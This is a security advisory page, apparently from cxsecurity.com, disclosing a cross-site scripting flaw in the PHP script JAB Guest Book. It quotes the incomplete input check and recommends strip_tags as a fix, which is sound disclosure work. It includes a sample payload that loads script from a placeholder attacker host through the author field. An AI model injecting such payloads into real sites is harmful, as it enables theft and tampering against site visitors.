JAB Guest Book XSS

2006.12.08
Credit: nj
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Script Name: JAB Guest Book Authors: Barnz (at) hotmail.co (dot) uk [email concealed] Website: James Barnsley Bug Report: NetJackal (nj[AT]hackerz[DOT]ir & nima_501[AT]yahoo[DOT]com) Status: Patch not released First i should apologize for my bad english. Intro: JAB Guest Book is a free guest book written in PHP, it works using flat files to store data which means no database is needed. Features include easy installation and customisation into your existing website. An administration panel which allows you to delete posts and ban users, additional administration configuration to un-ban users and to use the bad word filter. Ability for users to post messages with topic, email and comments including emotions (smilies). The main guest book works completely using only one file. Bugs Description: look at pbguestbook.php at line 425: function invalideregtest($input) { $checkcount = 0; //$exinput = str_split($input); $countname = count($exinput); for($i=0; $i<$countname; $i++) { if(!ereg("[A-Za-z0-9]", $input[$i]) == 1) { $checkcount++; } } if($checkcount != 0) { $input = "no"; } else { $input = "yes"; } return($input); } $check1 = invalideregtest($topic); script just check $topic by invalideregtest function. so what's happen if we put some thing lile <SCRIPT SRC=http://Hacler/EVIL.js></script> in $author? yes true answer xss happens Solution: Edit the code and check other inputs by invalideregtest function or simply remove html tags by strip_tags function (PHP built-in function)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top